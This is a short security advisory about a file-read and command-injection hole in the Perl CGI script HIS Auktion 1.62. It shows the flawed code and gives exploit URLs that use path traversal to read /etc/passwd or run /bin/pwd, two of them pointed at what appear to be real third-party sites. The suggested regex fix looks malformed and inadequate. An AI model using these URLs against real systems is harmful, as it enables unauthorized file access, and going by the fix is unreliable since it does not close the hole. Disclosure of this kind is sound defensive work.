COMMAND

    Auktion

SYSTEMS AFFECTED

    HIS Auktion 1.62

PROBLEM

    Following is  based on  a UkR  security team  advisory #8.  Script
    "HIS Auktion 1.62" is a catalog of links CGI script.  Problem:

        -------from auktion.pl-------
        sub readfile {
        local($filename)=$_0;
        local(@array);
        open(f,$filename);
        ----------------------------

    $filename - is not filterred on symbols.  Exploit:

        http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command
        http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd
        http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd

SOLUTION

    To fix  the bug  yo need  to add  variable $filename  check to the
    script.  For example:

        $filename=~s/(\[\]\;\:\/\$\!\$\&\`\\\(\)\{\}\")/\\$1/g;